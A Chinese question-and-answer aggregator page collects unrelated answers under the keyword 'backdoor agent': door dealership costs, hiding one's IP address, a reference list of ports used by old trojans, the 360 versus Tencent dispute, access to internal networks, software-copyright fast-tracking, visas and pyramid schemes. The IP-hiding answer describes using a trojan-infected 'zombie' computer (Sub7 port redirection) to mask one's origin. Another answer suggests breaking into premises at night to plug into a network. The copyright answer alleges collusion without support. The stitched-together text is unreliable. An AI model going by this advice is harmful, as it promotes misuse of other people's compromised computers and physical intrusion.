當前位置:首頁 » 代理許可 » 後門代理

後門代理

發布時間: 2021-03-08 03:12:07

① 做不銹鋼門代理要投資多少錢

一間門抄面大約28平方以上,(地區間價格有差別)
一輛送貨車,麵包車要五菱微面以上,後門開口較大。(4萬左右)
如果請工人要2名左右。(地區間有差別)
需要的電動工具有,切割機,磨機,沖擊鑽,拋光機,電批等。(建議用博士,全套10000以內。)
門面裝修。(28平方左右,自己干1.8萬吧)
代理費,金六福等比較出名的也沒有代理費吧
上樣板費,按產品市場價。(十個樣板大約2萬吧)
其餘就是業務費用。
這樣,你可以大約換算下是多少了。如果對營銷有興趣 網路八土路

② 如何開放自己的IP 做代理IP

通過軟體也可以:安裝CCProxy軟體,使用WINGATE做代理

首先說說隱藏真實IP的方法,最簡單的方法就是使用代理伺服器。與直接連接到Internet相比,使用代理伺服器能保護上網用戶的IP地址,從而保障上網安全。代理伺服器的原理是在客戶機和遠程伺服器之間架設一個「中轉站」,當客戶機向遠程伺服器提出服務要求後,代理伺服器首先截取用戶的請求,然後代理伺服器將服務請求轉交遠程伺服器,從而實現客戶機和遠程伺服器之間的聯系。很顯然,使用代理伺服器後遠端伺服器包括其它用戶只能探測到代理伺服器的IP地址而不是用戶的IP地址,這就實現了隱藏用戶IP地址的目的,保障了用戶上網安全。而且,這樣還有一個好處,那就是如果有許多用戶共用一個代理器時,當有人訪問過某一站點後,所訪問的內容便會保存在代理伺服器的硬碟上,如果再有人訪問該站點,這些內容便會直接從代理伺服器中獲取,而不必再次連接遠端伺服器,因此可以節約帶寬,提高訪問速度。

建議您最好用免費代理伺服器,尋找免費代理伺服器的方法有很多,你可以試試用ProxyHunter(代理獵手),它能自動為您搜索出多個免費代理伺服器,並驗證各個伺服器的連接速度,從而讓你選擇最佳途徑。更重要的是,代理伺服器不僅支持瀏覽軟體,而且支持電子郵件、FTP、下載、離線瀏覽等功能軟體,可謂無所不在。【點擊下載代理獵手 3.1】。不過這種方法比較費時、費事,建議不到萬不得以時還是不用為好。最好的方法是使用現成的免費代理伺服器,現在網上有不少網站定期提供最新的免費代理伺服器,如這里提供的代理伺服器的更新速度就非常快,而且各種類型的代理都有:http://www.emaga.net/8341/myann/index.asp 。建議大家把這個網頁放入你的收藏夾,這樣你就再也不用為找不到好的免費代理伺服器而發愁了。

找到免費代理伺服器後,就可以使用它了。以IE瀏覽器為例,運行IE,點擊「工具」→「Interner選項」,在彈出的「Interner選項」對話框中選擇「連接」標簽,再點擊「設置」按鈕,在彈出的對話框中把「對此連接使用代理伺服器」前面的框勾選上,然後在「地址」和「埠」欄中填入你找到的代理伺服器IP和所用埠即可。

同時在「高級」設置中你還可以對不同的伺服器,例如HTTP、FTP設定不同的代理伺服器地址和埠。這樣一來,當你再訪問那些網頁時,頁面上顯示的就不再是你的真實IP了。

不過,並不是所有的代理都不將你的真正的IP向目標地址上發送,假如你使用A4proxy之類的程序檢測一些代理,發現http-ip-forward是存在的話,那證明該代理會把你的真正IP向目標地址發去,如果在一些聊天室中使用,會被高級別的人看到真正的IP。

另外,在代理中有HTTP和SOCKS代理之分,在SOCKS代理中又有SOCKS4和SOCKS5代理之分,SOCKS4和SOCKS5不同之處在於SOCKS5支持UDP這種協議,但SOCKS4是不支持的,所以在QQ上不可以使用SOCKS4代理,因為QQ使用的是UDP協議,但在ICQ上就可以使用SOCKS4或SOCKS5代理。

隱藏IP的另外一個方法是利用受控於你的電腦上的木馬(也就是利用肉雞),該電腦可以自由訪問網路且不限於和你在一起(比方說單位或學校的電腦)。一些國外的木馬如Sub7,具有「埠轉向」功能,假設你想看xxx.com 這個網站的內容,而這個網站會記錄訪問者的IP,那麼你可以這樣做:假設受控電腦上有木馬Sub7服務端程序在運行,請在自己的電腦上運行Sub7客戶端,連接上那台電腦,使用埠轉向的功能,在那台電腦上打開一個90埠,設定凡是從這個埠進去的數據都會轉向到xxx.com 這個網站的80埠去(80埠是默認的www服務埠)。假設那個感染了Sub7的電腦的IP是202.202.202.202,那麼只要在瀏覽器上輸入http://202.202.202.202:90 ,就可以看到 xxx.com 這個網站的內容的了,而且那個網站記錄下的訪問的IP是202.202.202.202,不是我們真正的IP,這樣就安全多了。

好了,現在你已經可以小小地「隱身」一把了,但還不夠徹底,要想「隱形」還必須隱藏隱藏計算機名和工作組。因為網上有許多黑客軟體可以查出你的計算機名和工作組,他們主要是通過搜索網上是否存在使用NetBIOS協議的用戶,來探測其機器名稱、IP地址等等信息,並藉此來攻擊你。

在Internet上,NetBIOS開放就和一個後門程序差不多。因為在你安裝TCP/IP協議時,NetBIOS也被Windows作為默認設置載入了你的電腦,而電腦隨即也具有了NetBIOS本身的開放性。換句話講,在不知不覺間,你的上網電腦已被打開了一個危險的「後門」。這個後門可以泄漏你的信息:你的計算機名和工作組。事實上,有許多人會用自己的真實姓名做計算機名稱,還有自己的單位名字作為工作組,這樣很容易根據某個人的固定信息找到某個人的IP地址。而網上針對IP地址的攻擊手段和工具實在是太多了,您說這是不是很危險呢?因此,如果你是一個單機用戶那麼完全可以禁止NetBIOS服務,從而睹上這個危險的「漏洞」。下面是解決辦法:

1.Win9x用戶

在Win9x下如果你是個撥號上網用戶,就完全不需要登錄到NT區域網絡環境,只需要在「控制面板」→「網路」,刪除「Microsoft網路用戶」,使用「Microsoft友好登錄」,另外也不要去設置「文件列印共享」就可以了。

2.WinNT用戶

在WinNT下你可以取消NetBIOS與TCP/IP協議的綁定,方法是:「控制面板」→「網路」→「NetBIOS介面」→「WINS客戶(TCP/IP)」,選擇「禁用」,確定後重啟。

3.Win2000或者WinXP用戶

先用滑鼠右鍵單擊「網路鄰居」,選擇「屬性」,進入「網路和撥號連接」,再用滑鼠右鍵單擊「本地連接」,選擇「屬性」,進入「本地連接屬性」。雙擊「Internet 協議(TCP/IP)」後,點擊「高級」,選擇「選項」條中的「TCP/IP 篩選」,在「只允許」中填入除了139之外要用到的埠。註:如果你在區域網中,這樣會影響區域網的使用。

下面再介紹一個對Win9x/NT/2000/XP用戶都有效地辦法:自己定製防火牆規則。以天網個人防火牆為例,選擇一條空規則,規定如下規則:「數據包方向」選「接收」,「對方IP地址」選「任何」,「協議」選「TCP」,「本地埠」選「139到139」,「對方埠」選「0到0」,在「標志位」中選上「SYN標志」,「動作」選「攔截」,然後保存即可.
最後,我們再說說如何在QQ中隱形。之所以單獨談QQ,是由於QQ已經成為絕大多數網民上網的必備工具了。

QQ採用的是UDP數據包通訊,攻擊者只要向你發送一個信息,他就可以通過監視UDP數據包來獲得你的IP和QQ的埠號。從理論上說,在直接通訊的模式下,想避免攻擊者發現你的IP地址是十分困難的。所以這里筆者介紹一種很常見的方法來避開對方知道你的QQ地址——使用代理伺服器。通過代理伺服器上QQ,就可以隱藏自己的真實IP,而攻擊者所看到的IP只是代理服務的地址。隱身登錄QQ後發送的消息是通過騰訊的伺服器中轉的,這樣攻擊者獲取的IP也只是騰訊伺服器的地址。

以最新的QQ2004為例,只要右鍵單擊屏幕右下角的QQ圖標,在彈出菜單中選擇「系統參數」,單擊「系統設置」中的「代理設置」,選中「使用自定義的網路設置」。在「類型」中選擇「SOCK5代理伺服器」在「伺服器」和「埠」一欄中輸入你尋找到的免費代理地址 「用戶名」和「密碼」一般不用填,點擊「測試」按鈕,如果你填入的代理地址有效,則會彈出「代理伺服器工作正常」提示框,否則就會彈出「無法連接到代理伺服器」的提示。上述步驟做完之後,最後點擊「確定」即可。提供免費代理伺服器的網站有很多,也可以自己用代理獵手等工具來查找。

如果沒有找到合適的Sock5代理,還可以使用支持HTTP協議的QQ服務,實現QQ連通。有了這個功能,非會員也能夠通過HTTP代理上線了。要想使用TCP方式登陸,只要在圖四所示圖中在「類型」中選擇「HTTP代理伺服器」。

然後輸入伺服器地址和埠(一般填80),這樣,非會員也可通過HTTP代理上線了。之後你就可以通過HTTP代理使用QQ了,而網友們看到的則是你的假IP,這樣就安全多了!

好了,現在就可以體驗隱身沖浪帶領的快感了,而且還安全了許多!真是一舉兩得。

③ 我是菜鳥,大家幫我看看這些埠是不是後門。*:*代表什麼

入侵電腦埠

埠:0
服務:Reserved
說明:通常用於分析操作系統。這一方法能夠工作是因為在一些系統中「0」是無效埠,當你試圖使用通常的閉合埠連接它時將產生不同的結果。一種典型的掃描,使用IP地址為0.0.0.0,設置ACK位並在乙太網層廣播。
埠:1
服務:tcpmux
說明:這顯示有人在尋找SGI Irix機器。Irix是實現tcpmux的主要提供者,默認情況下tcpmux在這種系統中被打開。Irix機器在發布是含有幾個默認的無密碼的帳戶,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。許多管理員在安裝後忘記刪除這些帳戶。因此HACKER在INTERNET上搜索tcpmux並利用這些帳戶。

埠:7
服務:Echo
說明:能看到許多人搜索Fraggle放大器時,發送到X.X.X.0和X.X.X.255的信息。

埠:19
服務:Character Generator
說明:這是一種僅僅發送字元的服務。UDP版本將會在收到UDP包後回應含有垃圾字元的包。TCP連接時會發送含有垃圾字元的數據流直到連接關閉。HACKER利用IP欺騙可以發動DoS攻擊。偽造兩個chargen伺服器之間的UDP包。同樣Fraggle DoS攻擊向目標地址的這個埠廣播一個帶有偽造受害者IP的數據包,受害者為了回應這些數據而過載。

埠:21
服務:FTP
說明:FTP伺服器所開放的埠,用於上傳、下載。最常見的攻擊者用於尋找打開anonymous的FTP伺服器的方法。這些伺服器帶有可讀寫的目錄。木馬Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所開放的埠。

埠:22
服務:Ssh
說明:PcAnywhere建立的TCP和這一埠的連接可能是為了尋找ssh。這一服務有許多弱點,如果配置成特定的模式,許多使用RSAREF庫的版本就會有不少的漏洞存在。

埠:23
服務:Telnet
說明:遠程登錄,入侵者在搜索遠程登錄UNIX的服務。大多數情況下掃描這一埠是為了找到機器運行的操作系統。還有使用其他技術,入侵者也會找到密碼。木馬Tiny Telnet Server就開放這個埠。

埠:25
服務:SMTP
說明:SMTP伺服器所開放的埠,用於發送郵件。入侵者尋找SMTP伺服器是為了傳遞他們的SPAM。入侵者的帳戶被關閉,他們需要連接到高帶寬的E-MAIL伺服器上,將簡單的信息傳遞到不同的地址。木馬Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都開放這個埠。

埠:31
服務:MSG Authentication
說明:木馬Master Paradise、Hackers Paradise開放此埠。

埠:42
服務:WINS Replication
說明:WINS復制

埠:53
服務:Domain Name Server(DNS)
說明:DNS伺服器所開放的埠,入侵者可能是試圖進行區域傳遞(TCP),欺騙DNS(UDP)或隱藏其他的通信。因此防火牆常常過濾或記錄此埠。

埠:67
服務:Bootstrap Protocol Server
說明:通過DSL和Cable modem的防火牆常會看見大量發送到廣播地址255.255.255.255的數據。這些機器在向DHCP伺服器請求一個地址。HACKER常進入它們,分配一個地址把自己作為局部路由器而發起大量中間人(man-in-middle)攻擊。客戶端向68埠廣播請求配置,伺服器向67埠廣播回應請求。這種回應使用廣播是因為客戶端還不知道可以發送的IP地址。

埠:69
服務:Trival File Transfer
說明:許多伺服器與bootp一起提供這項服務,便於從系統下載啟動代碼。但是它們常常由於錯誤配置而使入侵者能從系統中竊取任何 文件。它們也可用於系統寫入文件。

埠:79
服務:Finger Server
說明:入侵者用於獲得用戶信息,查詢操作系統,探測已知的緩沖區溢出錯誤,回應從自己機器到其他機器Finger掃描。

埠:80
服務:HTTP
說明:用於網頁瀏覽。木馬Executor開放此埠。

埠:99
服務:Metagram Relay
說明:後門程序ncx99開放此埠。

埠:102
服務:Message transfer agent(MTA)-X.400 over TCP/IP
說明:消息傳輸代理。

埠:109
服務:Post Office Protocol -Version3
說明:POP3伺服器開放此埠,用於接收郵件,客戶端訪問伺服器端的郵件服務。POP3服務有許多公認的弱點。關於用戶名和密碼交 換緩沖區溢出的弱點至少有20個,這意味著入侵者可以在真正登陸前進入系統。成功登陸後還有其他緩沖區溢出錯誤。

埠:110
服務:SUN公司的RPC服務所有埠
說明:常見RPC服務有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等

埠:113
服務:Authentication Service
說明:這是一個許多計算機上運行的協議,用於鑒別TCP連接的用戶。使用標準的這種服務可以獲得許多計算機的信息。但是它可作為許多服務的記錄器,尤其是FTP、POP、IMAP、SMTP和IRC等服務。通常如果有許多客戶通過防火牆訪問這些服務,將會看到許多這個埠的連接請求。記住,如果阻斷這個埠客戶端會感覺到在防火牆另一邊與E-MAIL伺服器的緩慢連接。許多防火牆支持TCP連接的阻斷過程中發回RST。這將會停止緩慢的連接。

埠:119
服務:Network News Transfer Protocol
說明:NEWS新聞組傳輸協議,承載USENET通信。這個埠的連接通常是人們在尋找USENET伺服器。多數ISP限制,只有他們的客戶才能訪問他們的新聞組伺服器。打開新聞組伺服器將允許發/讀任何人的帖子,訪問被限制的新聞組伺服器,匿名發帖或發送SPAM。

埠:135
服務:Location Service
說明:Microsoft在這個埠運行DCE RPC end-point mapper為它的DCOM服務。這與UNIX 111埠的功能很相似。使用DCOM和RPC的服務利用計算機上的end-point mapper注冊它們的位置。遠端客戶連接到計算機時,它們查找end-point mapper找到服務的位置。HACKER掃描計算機的這個埠是為了找到這個計算機上運行Exchange Server嗎?什麼版本?還有些DOS攻擊直接針對這個埠。

埠:137、138、139
服務:NETBIOS Name Service
說明:其中137、138是UDP埠,當通過網上鄰居傳輸文件時用這個埠。而139埠:通過這個埠進入的連接試圖獲得NetBIOS/SMB服務。這個協議被用於windows文件和列印機共享和SAMBA。還有WINS Regisrtation也用它。

埠:143
服務:Interim Mail Access Protocol v2
說明:和POP3的安全問題一樣,許多IMAP伺服器存在有緩沖區溢出漏洞。記住:一種LINUX蠕蟲(admv0rm)會通過這個埠繁殖,因此許多這個埠的掃描來自不知情的已經被感染的用戶。當REDHAT在他們的LINUX發布版本中默認允許IMAP後,這些漏洞變的很流行。這一埠還被用於IMAP2,但並不流行。

埠:161
服務:SNMP
說明:SNMP允許遠程管理設備。所有配置和運行信息的儲存在資料庫中,通過SNMP可獲得這些信息。許多管理員的錯誤配置將被暴露在Internet。Cackers將試圖使用默認的密碼public、private訪問系統。他們可能會試驗所有可能的組合。SNMP包可能會被錯誤的指向用戶的網路。

埠:177
服務:X Display Manager Control Protocol
說明:許多入侵者通過它訪問X-windows操作台,它同時需要打開6000埠。

埠:389
服務:LDAP、ILS
說明:輕型目錄訪問協議和NetMeeting Internet Locator Server共用這一埠。

埠:443
服務:Https
說明:網頁瀏覽埠,能提供加密和通過安全埠傳輸的另一種HTTP。

埠:456
服務:[NULL]
說明:木馬HACKERS PARADISE開放此埠。

埠:513
服務:Login,remote login
說明:是從使用cable modem或DSL登陸到子網中的UNIX計算機發出的廣播。這些人為入侵者進入他們的系統提供了信息。

埠:544
服務:[NULL]
說明:kerberos kshell

埠:548
服務:Macintosh,File Services(AFP/IP)
說明:Macintosh,文件服務。

埠:553
服務:CORBA IIOP (UDP)
說明:使用cable modem、DSL或VLAN將會看到這個埠的廣播。CORBA是一種面向對象的RPC系統。入侵者可以利用這些信息進入系統。

埠:555
服務:DSF
說明:木馬PhAse1.0、Stealth Spy、IniKiller開放此埠。

埠:568
服務:Membership DPA
說明:成員資格 DPA。

埠:569
服務:Membership MSN
說明:成員資格 MSN。

埠:635
服務:mountd
說明:Linux的mountd Bug。這是掃描的一個流行BUG。大多數對這個埠的掃描是基於UDP的,但是基於TCP的mountd有所增加(mountd同時運行於兩個埠)。記住mountd可運行於任何埠(到底是哪個埠,需要在埠111做portmap查詢),只是Linux默認埠是635,就像NFS通常運行於2049埠。

埠:636
服務:LDAP
說明:SSL(Secure Sockets layer)

埠:666
服務:Doom Id Software
說明:木馬Attack FTP、Satanz Backdoor開放此埠

埠:993
服務:IMAP
說明:SSL(Secure Sockets layer)

埠:1001、1011
服務:[NULL]
說明:木馬Silencer、WebEx開放1001埠。木馬Doly Trojan開放1011埠。

埠:1024
服務:Reserved
說明:它是動態埠的開始,許多程序並不在乎用哪個埠連接網路,它們請求系統為它們分配下一個閑置埠。基於這一點分配從埠1024開始。這就是說第一個向系統發出請求的會分配到1024埠。你可以重啟機器,打開Telnet,再打開一個窗口運行natstat -a 將會看到Telnet被分配1024埠。還有SQL session也用此埠和5000埠。

埠:1025、1033
服務:1025:network blackjack 1033:[NULL]
說明:木馬netspy開放這2個埠。

埠:1080
服務:SOCKS
說明:這一協議以通道方式穿過防火牆,允許防火牆後面的人通過一個IP地址訪問INTERNET。理論上它應該只允許內部的通信向外到達INTERNET。但是由於錯誤的配置,它會允許位於防火牆外部的攻擊穿過防火牆。WinGate常會發生這種錯誤,在加入IRC聊天室時常會看到這種情況。
埠:1170
服務:[NULL]
說明:木馬Streaming Audio Trojan、Psyber Stream Server、Voice開放此埠。

埠:1234、1243、6711、6776
服務:[NULL]
說明:木馬SubSeven2.0、Ultors Trojan開放1234、6776埠。木馬SubSeven1.0/1.9開放1243、6711、6776埠。

埠:1245
服務:[NULL]
說明:木馬Vodoo開放此埠。

埠:1433
服務:SQL
說明:Microsoft的SQL服務開放的埠。

埠:1492
服務:stone-design-1
說明:木馬FTP99CMP開放此埠。

埠:1500
服務:RPC client fixed port session queries
說明:RPC客戶固定埠會話查詢

埠:1503
服務:NetMeeting T.120
說明:NetMeeting T.120

埠:1524
服務:ingress
說明:許多攻擊腳本將安裝一個後門SHELL於這個埠,尤其是針對SUN系統中Sendmail和RPC服務漏洞的腳本。如果剛安裝了防火牆就看到在這個埠上的連接企圖,很可能是上述原因。可以試試Telnet到用戶的計算機上的這個埠,看看它是否會給你一個SHELL。連接到600/pcserver也存在這個問題。

埠:1600
服務:issd
說明:木馬Shivka-Burka開放此埠。

埠:1720
服務:NetMeeting
說明:NetMeeting H.233 call Setup。

埠:1731
服務:NetMeeting Audio Call Control
說明:NetMeeting音頻調用控制。

埠:1807
服務:[NULL]
說明:木馬SpySender開放此埠。

埠:1981
服務:[NULL]
說明:木馬ShockRave開放此埠。

埠:1999
服務:cisco identification port
說明:木馬BackDoor開放此埠。

埠:2000
服務:[NULL]
說明:木馬GirlFriend 1.3、Millenium 1.0開放此埠。

埠:2001
服務:[NULL]
說明:木馬Millenium 1.0、Trojan Cow開放此埠。

埠:2023
服務:xinuexpansion 4
說明:木馬Pass Ripper開放此埠。

埠:2049
服務:NFS
說明:NFS程序常運行於這個埠。通常需要訪問Portmapper查詢這個服務運行於哪個埠。

埠:2115
服務:[NULL]
說明:木馬Bugs開放此埠。

埠:2140、3150
服務:[NULL]
說明:木馬Deep Throat 1.0/3.0開放此埠。

埠:2500
服務:RPC client using a fixed port session replication
說明:應用固定埠會話復制的RPC客戶

埠:2583
服務:[NULL]
說明:木馬Wincrash 2.0開放此埠。

埠:2801
服務:[NULL]
說明:木馬Phineas Phucker開放此埠。

埠:3024、4092
服務:[NULL]
說明:木馬WinCrash開放此埠。

埠:3128
服務:squid
說明:這是squid HTTP代理伺服器的默認埠。攻擊者掃描這個埠是為了搜尋一個代理伺服器而匿名訪問Internet。也會看到搜索其他代理伺服器的埠8000、8001、8080、8888。掃描這個埠的另一個原因是用戶正在進入聊天室。其他用戶也會檢驗這個埠以確定用戶的機器是否支持代理。

埠:3129
服務:[NULL]
說明:木馬Master Paradise開放此埠。

埠:3150
服務:[NULL]
說明:木馬The Invasor開放此埠。

埠:3210、4321
服務:[NULL]
說明:木馬SchoolBus開放此埠

埠:3333
服務:dec-notes
說明:木馬Prosiak開放此埠

埠:3389
服務:超級終端
說明:WINDOWS 2000終端開放此埠。

埠:3700
服務:[NULL]
說明:木馬Portal of Doom開放此埠

埠:3996、4060
服務:[NULL]
說明:木馬RemoteAnything開放此埠

埠:4000
服務:QQ客戶端
說明:騰訊QQ客戶端開放此埠。

埠:4092
服務:[NULL]
說明:木馬WinCrash開放此埠。

埠:4590
服務:[NULL]
說明:木馬ICQTrojan開放此埠。

埠:5000、5001、5321、50505
服務:[NULL]
說明:木馬blazer5開放5000埠。木馬Sockets de Troie開放5000、5001、5321、50505埠。

埠:5400、5401、5402
服務:[NULL]
說明:木馬Blade Runner開放此埠。

埠:5550
服務:[NULL]
說明:木馬xtcp開放此埠。

埠:5569
服務:[NULL]
說明:木馬Robo-Hack開放此埠。

埠:5632
服務:pcAnywere
說明:有時會看到很多這個埠的掃描,這依賴於用戶所在的位置。當用戶打開pcAnywere時,它會自動掃描區域網C類網以尋找可能的代理(這里的代理是指agent而不是proxy)。入侵者也會尋找開放這種服務的計算機。,所以應該查看這種掃描的源地址。一些搜尋pcAnywere的掃描包常含埠22的UDP數據包。

埠:5742
服務:[NULL]
說明:木馬WinCrash1.03開放此埠。

埠:6267
服務:[NULL]
說明:木馬廣外女生開放此埠。

埠:6400
服務:[NULL]
說明:木馬The tHing開放此埠。

埠:6670、6671
服務:[NULL]
說明:木馬Deep Throat開放6670埠。而Deep Throat 3.0開放6671埠。

埠:6883
服務:[NULL]
說明:木馬DeltaSource開放此埠。

埠:6969
服務:[NULL]
說明:木馬Gatecrasher、Priority開放此埠。

埠:6970
服務:RealAudio
說明:RealAudio客戶將從伺服器的6970-7170的UDP埠接收音頻數據流。這是由TCP-7070埠外向控制連接設置的。

埠:7000
服務:[NULL]
說明:木馬Remote Grab開放此埠。

埠:7300、7301、7306、7307、7308
服務:[NULL]
說明:木馬NetMonitor開放此埠。另外NetSpy1.0也開放7306埠。

埠:7323
服務:[NULL]
說明:Sygate伺服器端。

埠:7626
服務:[NULL]
說明:木馬Giscier開放此埠。

埠:7789
服務:[NULL]
說明:木馬ICKiller開放此埠。

埠:8000
服務:OICQ
說明:騰訊QQ伺服器端開放此埠。

埠:8010
服務:Wingate
說明:Wingate代理開放此埠。

埠:8080
服務:代理埠
說明:WWW代理開放此埠。

埠:9400、9401、9402
服務:[NULL]
說明:木馬Incommand 1.0開放此埠。

埠:9872、9873、9874、9875、10067、10167
服務:[NULL]
說明:木馬Portal of Doom開放此埠。

埠:9989
服務:[NULL]
說明:木馬iNi-Killer開放此埠。

埠:11000
服務:[NULL]
說明:木馬SennaSpy開放此埠。

埠:11223
服務:[NULL]
說明:木馬Progenic trojan開放此埠。

埠:12076、61466
服務:[NULL]
說明:木馬Telecommando開放此埠。

埠:12223
服務:[NULL]
說明:木馬Hack'99 KeyLogger開放此埠。

埠:12345、12346
服務:[NULL]
說明:木馬NetBus1.60/1.70、GabanBus開放此埠。

埠:12361
服務:[NULL]
說明:木馬Whack-a-mole開放此埠。

埠:13223
服務:PowWow
說明:PowWow是Tribal Voice的聊天程序。它允許用戶在此埠打開私人聊天的連接。這一程序對於建立連接非常具有攻擊性。它會駐扎在這個TCP埠等回應。造成類似心跳間隔的連接請求。如果一個撥號用戶從另一個聊天者手中繼承了IP地址就會發生好象有很多不同的人在測試這個埠的情況。這一協議使用OPNG作為其連接請求的前4個位元組。

埠:16969
服務:[NULL]
說明:木馬Priority開放此埠。

埠:17027
服務:Concent
說明:這是一個外向連接。這是由於公司內部有人安裝了帶有Concent"adbot"的共享軟體。Concent"adbot"是為共享軟體顯示廣告服務的。使用這種服務的一種流行的軟體是Pkware。

埠:19191
服務:[NULL]
說明:木馬藍色火焰開放此埠。

埠:20000、20001
服務:[NULL]
說明:木馬Millennium開放此埠。

埠:20034
服務:[NULL]
說明:木馬NetBus Pro開放此埠。

埠:21554
服務:[NULL]
說明:木馬GirlFriend開放此埠。

埠:22222
服務:[NULL]
說明:木馬Prosiak開放此埠。

埠:23456
服務:[NULL]
說明:木馬Evil FTP、Ugly FTP開放此埠。

埠:26274、47262
服務:[NULL]
說明:木馬Delta開放此埠。

埠:27374
服務:[NULL]
說明:木馬Subseven 2.1開放此埠。

埠:30100
服務:[NULL]
說明:木馬NetSphere開放此埠。

埠:30303
服務:[NULL]
說明:木馬Socket23開放此埠。

埠:30999
服務:[NULL]
說明:木馬Kuang開放此埠。

埠:31337、31338
服務:[NULL]
說明:木馬BO(Back Orifice)開放此埠。另外木馬DeepBO也開放31338埠。

埠:31339
服務:[NULL]
說明:木馬NetSpy DK開放此埠。

埠:31666
服務:[NULL]
說明:木馬BOWhack開放此埠。

埠:33333
服務:[NULL]
說明:木馬Prosiak開放此埠。

埠:34324
服務:[NULL]
說明:木馬Tiny Telnet Server、BigGluck、TN開放此埠。

埠:40412
服務:[NULL]
說明:木馬The Spy開放此埠。

埠:40421、40422、40423、40426、
服務:[NULL]
說明:木馬Masters Paradise開放此埠。

埠:43210、54321
服務:[NULL]
說明:木馬SchoolBus 1.0/2.0開放此埠。

埠:44445
服務:[NULL]
說明:木馬Happypig開放此埠。

埠:50766
服務:[NULL]
說明:木馬Fore開放此埠。

埠:53001
服務:[NULL]
說明:木馬Remote Windows Shutdown開放此埠。

埠:65000
服務:[NULL]
說明:木馬Devil 1.03開放此埠。

埠:88
說明:Kerberos krb5。另外TCP的88埠也是這個用途。

埠:137
說明:SQL Named Pipes encryption over other protocols name lookup(其他協議名稱查找上的SQL命名管道加密技術)和SQL RPC encryption over other protocols name lookup(其他協議名稱查找上的SQL RPC加密技術)和Wins NetBT name service(WINS NetBT名稱服務)和Wins Proxy都用這個埠。

埠:161
說明:Simple Network Management Protocol(SMTP)(簡單網路管理協議)。

埠:162
說明:SNMP Trap(SNMP陷阱)

埠:445
說明:Common Internet File System(CIFS)(公共Internet文件系統)

埠:464
說明:Kerberos kpasswd(v5)。另外TCP的464埠也是這個用途。

埠:500
說明:Internet Key Exchange(IKE)(Internet密鑰交換)

埠:1645、1812
說明:Remot Authentication Dial-In User Service(RADIUS)authentication(Routing and Remote Access)(遠程認證撥號用戶服務)

埠:1646、1813
說明:RADIUS accounting(Routing and Remote Access)(RADIUS記帳(路由和遠程訪問))

埠:1701
說明:Layer Two Tunneling Protocol(L2TP)(第2層隧道協議)

埠:1801、3527
說明:Microsoft Message Queue Server(Microsoft消息隊列伺服器)。還有TCP的135、1801、2101、2103、2105也是同樣的用途。

埠:2504
說明:Network Load Balancing(網路平衡負荷)

④ 360那些後門會出現在他們代理的殺毒軟體上嗎

其實我覺得吧偷窺不偷窺的無所謂了
事實是如何只有他們自己專清楚
360說QQ偷窺 他自己有沒有偷窺你能確定嗎屬?
騰訊昨天作出那個決定也是迫不得已
畢竟360實在做得過分了。
我以前也裝了360的,看到過提示,直接對騰訊進行人身攻擊
把我逼急了我也做和騰訊一樣的事情。
當然如果不是出了昨天的事情我也不會卸載360,
以前和我室友去修電腦,修電腦的人都特別提醒過不能安裝360(我現在在新加坡的,試問一個國外的修電腦的怎麼還對360有這么大意見?)
那個時候我朋友就沒裝了,我電腦上也沒卸載掉 就一直放著。
後來想安裝許多軟體都不行。
還有一個問題,那些安裝軟體的程序都提示的不在有360的電腦上進行安裝,難道他們也來偷窺隱私的?= =
不多說了 僅為我對360的看法

⑤ ip代理的用法

1、此內部網路有你認識的人,你可以在他的配合下使用一些遠程工具,如QQ的遠程連接訪版問;
2、你是此內權部網路的網路管理人員,可以配置相應的伺服器後門訪問,比如說你可以開放伺服器的遠程連接至公網,如mstsc
3、你是此內部網路的管理人員,你可以在此內部網路與外部網路的防火強上配置vpn,通過vpn撥號進入此網路,vpn的產品很多,常見如cisco vpn 客戶端
4、你深夜潛入此內部網路的所在地,使用RJ45的網線接入此網路內,條件為:RJ45網線1根,筆記本電腦1台(建議小而輕,避免太重太大被人發現)

⑥ 軟著申請為什麼只有代理能辦加急

軟體著作權申請來可以個人源辦理軟體著作權申請加急,不僅僅是代理能辦加急,個人也可以辦理申請軟體著作權加急。但是,常見的是代理加急這種說法。原因在於,一般來說,如果本人去申請,著

作權中心機構他們審閱,大概30個工作日他們才會審閱你的(甚至更長時間),所以申請下來可能1個月時間(算很快),2個月,甚至半年,而且還不一定過,這樣很費時間和精力。但是這些代理公司他

們和著作權中心是有隱晦的合作關系的,再加上,代理能加急是因為對各方面業務都非常的熟悉了,不會出現差錯,所以他們會給你加急審閱,而且審核力度比較松,就是因為這樣,代理公司才能這么火爆,很多人都會選擇代理申請,這樣個人申請加急的說法就漸漸不成文。

(6)後門代理擴展閱讀

申請軟體著作權登記的,應當提交以下主要證明文件:

(一)自然人、法人或者其他組織的身份證明;

(二)有著作權歸屬書面合同或者項目任務書的,應當提交合同或者項目任務書;

(三)經原軟體著作權人許可,在原有軟體上開發的軟體,應當提交原著作權人的許可證明;

(四)權利繼承人、受讓人或者承受人,提交權利繼承、受讓或者承受的證明。

參考資料

網路-軟體著作權

⑦ 美國簽證如何找關系 找後門

如果你只是留學的話,去美國吧 ,國內還是比較認的!如果是移民的話,建議你移民到加拿大,不是說美國不好,而是相對而言,加拿大福利更好,人權更有保證!生活壓力也會比美國小很多!

⑧ 卡瘦是不是傳銷,有做過代理的嘛

卡瘦棒是不是傳銷,建議你撥打110報案或者求助,請求公安機關的人民警察協助進行辨別或者求證。公安機關的調查結論最具權威。報案後,公安機關立案後就會展開偵查,如確系騙子,公安機關會抓獲犯罪嫌疑人,給予其法律制裁。

拓展資料:

1、簡介

傳銷是指組織者發展人員,通過對被發展人員以其直接或者間接發展的人員數量或者業績為依據計算和給付報酬,或者要求被發展人員以交納一定費用為條件取得加入資格等方式獲得財富的違法行為。傳銷的本質是"龐氏騙局",即以後來者的錢發前面人的收益。

2、發展形成

傳銷產生於二戰後期的美國,成型於戰後的日本,發展於中國。傳銷培訓教材不僅極富煽動性和欺騙性,而且具有很多心理學的要素,極易誘人上當。在國外傳銷和直銷是一個意思,也就是說國外只有傳銷這一個概念,國外傳銷的主要概念是:以顧客使用產品產生的口碑作為動力,讓顧客來幫助經銷商來宣傳產品後分享一部分利潤,也就是客戶傳播式銷售。這跟國內的傳銷是兩個概念。

3、主體要件

